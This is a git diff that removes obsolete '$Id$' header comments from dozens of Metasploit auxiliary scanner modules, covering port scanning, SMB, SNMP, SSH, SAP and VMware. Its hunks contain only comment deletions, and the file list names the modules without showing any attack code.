a/modules/auxiliary/scanner/portscan/tcp.rb b/modules/auxiliary/scanner/portscan/tcp.rb index 709ef5c6ee..e21ad6bda8 100644 --- a/modules/auxiliary/scanner/portscan/tcp.rb +++ b/modules/auxiliary/scanner/portscan/tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/portscan/xmas.rb b/modules/auxiliary/scanner/portscan/xmas.rb index fb045eef43..377615fa46 100644 --- a/modules/auxiliary/scanner/portscan/xmas.rb +++ b/modules/auxiliary/scanner/portscan/xmas.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb index 4265640aae..cdf22d5ab2 100644 --- a/modules/auxiliary/scanner/postgres/postgres_hashdump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_hashdump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/postgres/postgres_login.rb b/modules/auxiliary/scanner/postgres/postgres_login.rb index 58d0e643ba..755e08ccc0 100644 --- a/modules/auxiliary/scanner/postgres/postgres_login.rb +++ b/modules/auxiliary/scanner/postgres/postgres_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb index d2e2c5761c..77cbc9a98b 100644 --- a/modules/auxiliary/scanner/postgres/postgres_schemadump.rb +++ b/modules/auxiliary/scanner/postgres/postgres_schemadump.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/postgres/postgres_version.rb b/modules/auxiliary/scanner/postgres/postgres_version.rb index 99da31ebf7..b2a1eb328f 100644 --- a/modules/auxiliary/scanner/postgres/postgres_version.rb +++ b/modules/auxiliary/scanner/postgres/postgres_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/rogue/rogue_recv.rb b/modules/auxiliary/scanner/rogue/rogue_recv.rb index c9f26dc984..8c16e2bda5 100644 --- a/modules/auxiliary/scanner/rogue/rogue_recv.rb +++ b/modules/auxiliary/scanner/rogue/rogue_recv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/rogue/rogue_send.rb b/modules/auxiliary/scanner/rogue/rogue_send.rb index aaa233305a..0fbec33a06 100644 --- a/modules/auxiliary/scanner/rogue/rogue_send.rb +++ b/modules/auxiliary/scanner/rogue/rogue_send.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/rservices/rexec_login.rb b/modules/auxiliary/scanner/rservices/rexec_login.rb index c0a403051b..eb360056b7 100644 --- a/modules/auxiliary/scanner/rservices/rexec_login.rb +++ b/modules/auxiliary/scanner/rservices/rexec_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/rservices/rlogin_login.rb b/modules/auxiliary/scanner/rservices/rlogin_login.rb index 08a8ce8093..8f9d251d95 100644 --- a/modules/auxiliary/scanner/rservices/rlogin_login.rb +++ b/modules/auxiliary/scanner/rservices/rlogin_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/rservices/rsh_login.rb b/modules/auxiliary/scanner/rservices/rsh_login.rb index 78e16992f0..cf436adf64 100644 --- a/modules/auxiliary/scanner/rservices/rsh_login.rb +++ b/modules/auxiliary/scanner/rservices/rsh_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb index e936e6bc64..95e16a8620 100644 --- a/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb +++ b/modules/auxiliary/scanner/sap/sap_icm_urlscan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb index 0e27e4a4c6..b383085ff3 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_abaplog.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb index 8b09e14a0a..95ade54c67 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_brute_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb index 8e8fec1e8c..528b72fe5d 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_extractusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb index 02ab323839..dc9f17efa2 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getaccesspoints.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb index 45e07bef1b..6b0720b4ad 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getenv.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb index c09b0f87b9..918aa4662c 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_getprocessparameter.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb index 87c27bc3c6..188671bd1a 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_instanceproperties.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb index 261da9b14a..3e4000cf8a 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_listlogfiles.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb index 1a3655af32..ca728e5d58 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_startprofile.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb index 11a8367c7f..7d49a1f2ef 100644 --- a/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb +++ b/modules/auxiliary/scanner/sap/sap_mgmt_con_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb index d41b17fb0b..ecc28f56cb 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_reboot.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_reboot.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/digi_addp_version.rb b/modules/auxiliary/scanner/scada/digi_addp_version.rb index 83687167c4..ccb4b41e84 100644 --- a/modules/auxiliary/scanner/scada/digi_addp_version.rb +++ b/modules/auxiliary/scanner/scada/digi_addp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb index d713af29e5..e6d6f4e7b8 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_serialport_scan.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/scada/digi_realport_version.rb b/modules/auxiliary/scanner/scada/digi_realport_version.rb index 9860efe614..3d03b2ebb3 100644 --- a/modules/auxiliary/scanner/scada/digi_realport_version.rb +++ b/modules/auxiliary/scanner/scada/digi_realport_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sip/enumerator.rb b/modules/auxiliary/scanner/sip/enumerator.rb index 610f9fc359..e8b5d59c15 100644 --- a/modules/auxiliary/scanner/sip/enumerator.rb +++ b/modules/auxiliary/scanner/sip/enumerator.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sip/enumerator_tcp.rb b/modules/auxiliary/scanner/sip/enumerator_tcp.rb index 7a7d8df0f6..03a059cb32 100644 --- a/modules/auxiliary/scanner/sip/enumerator_tcp.rb +++ b/modules/auxiliary/scanner/sip/enumerator_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sip/options.rb b/modules/auxiliary/scanner/sip/options.rb index 977121dd4a..8e68b6a76a 100644 --- a/modules/auxiliary/scanner/sip/options.rb +++ b/modules/auxiliary/scanner/sip/options.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sip/options_tcp.rb b/modules/auxiliary/scanner/sip/options_tcp.rb index d505f561c8..db61db983a 100644 --- a/modules/auxiliary/scanner/sip/options_tcp.rb +++ b/modules/auxiliary/scanner/sip/options_tcp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb index eea9e98784..14708519fd 100644 --- a/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb +++ b/modules/auxiliary/scanner/sip/sipdroid_ext_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/pipe_auditor.rb b/modules/auxiliary/scanner/smb/pipe_auditor.rb index 0fe359de19..c0684be2fd 100644 --- a/modules/auxiliary/scanner/smb/pipe_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb index f0b5260920..eca44759ff 100644 --- a/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb +++ b/modules/auxiliary/scanner/smb/pipe_dcerpc_auditor.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb2.rb b/modules/auxiliary/scanner/smb/smb2.rb index 77a7cc21a8..510e442288 100644 --- a/modules/auxiliary/scanner/smb/smb2.rb +++ b/modules/auxiliary/scanner/smb/smb2.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb_enumshares.rb b/modules/auxiliary/scanner/smb/smb_enumshares.rb index cdfbeb419a..3cce70f1df 100644 --- a/modules/auxiliary/scanner/smb/smb_enumshares.rb +++ b/modules/auxiliary/scanner/smb/smb_enumshares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb_enumusers.rb b/modules/auxiliary/scanner/smb/smb_enumusers.rb index 520e2deb99..a10619d1b7 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb index 0582b2626e..01c648ec2d 100644 --- a/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb +++ b/modules/auxiliary/scanner/smb/smb_enumusers_domain.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb_lookupsid.rb b/modules/auxiliary/scanner/smb/smb_lookupsid.rb index 2168e91585..8b8d02c3dc 100644 --- a/modules/auxiliary/scanner/smb/smb_lookupsid.rb +++ b/modules/auxiliary/scanner/smb/smb_lookupsid.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smb/smb_version.rb b/modules/auxiliary/scanner/smb/smb_version.rb index fbb770395d..ac7409a9a8 100644 --- a/modules/auxiliary/scanner/smb/smb_version.rb +++ b/modules/auxiliary/scanner/smb/smb_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smtp/smtp_enum.rb b/modules/auxiliary/scanner/smtp/smtp_enum.rb index 2766795f0a..04ba404bed 100644 --- a/modules/auxiliary/scanner/smtp/smtp_enum.rb +++ b/modules/auxiliary/scanner/smtp/smtp_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/smtp/smtp_version.rb b/modules/auxiliary/scanner/smtp/smtp_version.rb index a44bd07643..e7375990ac 100644 --- a/modules/auxiliary/scanner/smtp/smtp_version.rb +++ b/modules/auxiliary/scanner/smtp/smtp_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/aix_version.rb b/modules/auxiliary/scanner/snmp/aix_version.rb index 2933987069..834c122836 100644 --- a/modules/auxiliary/scanner/snmp/aix_version.rb +++ b/modules/auxiliary/scanner/snmp/aix_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb index 5570362b2c..1860c435e0 100644 --- a/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb +++ b/modules/auxiliary/scanner/snmp/cisco_config_tftp.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb index 631b1f2cd9..139752a7ae 100644 --- a/modules/auxiliary/scanner/snmp/cisco_upload_file.rb +++ b/modules/auxiliary/scanner/snmp/cisco_upload_file.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/snmp_enum.rb b/modules/auxiliary/scanner/snmp/snmp_enum.rb index ec10c11ecd..9d00bf3765 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enum.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enum.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb index 183710d530..948914ea89 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumshares.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumshares.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb index 0ce4d6caf8..771cabd62d 100644 --- a/modules/auxiliary/scanner/snmp/snmp_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/snmp_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/snmp_login.rb b/modules/auxiliary/scanner/snmp/snmp_login.rb index b3982fb559..a6ee3ddbd8 100644 --- a/modules/auxiliary/scanner/snmp/snmp_login.rb +++ b/modules/auxiliary/scanner/snmp/snmp_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/snmp_set.rb b/modules/auxiliary/scanner/snmp/snmp_set.rb index 7ba24efd46..5a35524018 100644 --- a/modules/auxiliary/scanner/snmp/snmp_set.rb +++ b/modules/auxiliary/scanner/snmp/snmp_set.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb index ab1779dc63..8d09d40402 100644 --- a/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb +++ b/modules/auxiliary/scanner/snmp/xerox_workcentre_enumusers.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ssh/ssh_login.rb b/modules/auxiliary/scanner/ssh/ssh_login.rb index 1d163d716f..e07b779710 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb index 47c12693fa..649561e716 100644 --- a/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb +++ b/modules/auxiliary/scanner/ssh/ssh_login_pubkey.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/ssh/ssh_version.rb b/modules/auxiliary/scanner/ssh/ssh_version.rb index e3fc88514f..57d8fa18fb 100644 --- a/modules/auxiliary/scanner/ssh/ssh_version.rb +++ b/modules/auxiliary/scanner/ssh/ssh_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telephony/wardial.rb b/modules/auxiliary/scanner/telephony/wardial.rb index 95aeca87d8..e7de815817 100644 --- a/modules/auxiliary/scanner/telephony/wardial.rb +++ b/modules/auxiliary/scanner/telephony/wardial.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb index 44d0dd0f15..5063999c45 100644 --- a/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/lantronix_telnet_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb index 77741cee0d..c5884fc5c0 100644 --- a/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb +++ b/modules/auxiliary/scanner/telnet/telnet_encrypt_overflow.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telnet/telnet_login.rb b/modules/auxiliary/scanner/telnet/telnet_login.rb index e76bd1a163..d2f7fbb532 100644 --- a/modules/auxiliary/scanner/telnet/telnet_login.rb +++ b/modules/auxiliary/scanner/telnet/telnet_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/telnet/telnet_version.rb b/modules/auxiliary/scanner/telnet/telnet_version.rb index 2682c02699..0225347fb5 100644 --- a/modules/auxiliary/scanner/telnet/telnet_version.rb +++ b/modules/auxiliary/scanner/telnet/telnet_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/tftp/tftpbrute.rb b/modules/auxiliary/scanner/tftp/tftpbrute.rb index 99cfba7582..b05f2d4bfc 100644 --- a/modules/auxiliary/scanner/tftp/tftpbrute.rb +++ b/modules/auxiliary/scanner/tftp/tftpbrute.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb index 2d7d761d5f..7540853f3f 100644 --- a/modules/auxiliary/scanner/upnp/ssdp_msearch.rb +++ b/modules/auxiliary/scanner/upnp/ssdp_msearch.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb index fd758794d5..06b3e20695 100644 --- a/modules/auxiliary/scanner/vmware/esx_fingerprint.rb +++ b/modules/auxiliary/scanner/vmware/esx_fingerprint.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmauthd_login.rb b/modules/auxiliary/scanner/vmware/vmauthd_login.rb index 0a2cc08984..f5137b903d 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_login.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_login.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmauthd_version.rb b/modules/auxiliary/scanner/vmware/vmauthd_version.rb index 7db383ae18..f86b583c19 100644 --- a/modules/auxiliary/scanner/vmware/vmauthd_version.rb +++ b/modules/auxiliary/scanner/vmware/vmauthd_version.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb index 569dcc560f..00e9759721 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_permissions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb index 025d137770..9039f597aa 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_sessions.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb index 54f626c2ac..d09dc7e3a8 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_users.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_users.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb index 948821801c..175571e14c 100644 --- a/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb +++ b/modules/auxiliary/scanner/vmware/vmware_enum_vms.rb @@ -1,7 +1,3 @@ -## -# $Id$ -## - ## # This file is part of the Metasploit Framework and may be subject to # redistribution and commercial restrictions. Please see the Metasploit diff --git a/modules/auxiliary/scanner/vmware/vmware_host_details.rb b/modules/auxiliary/scanner/vmware/vmware_host_details.rb index 164965300b..fe9841ce7d 100644 --- a/modules/auxiliary/scanner/vmware/vmware_host_details.rb +++ b/modules/auxiliary/scanner/vmware/vmware_host_details.rb @@ 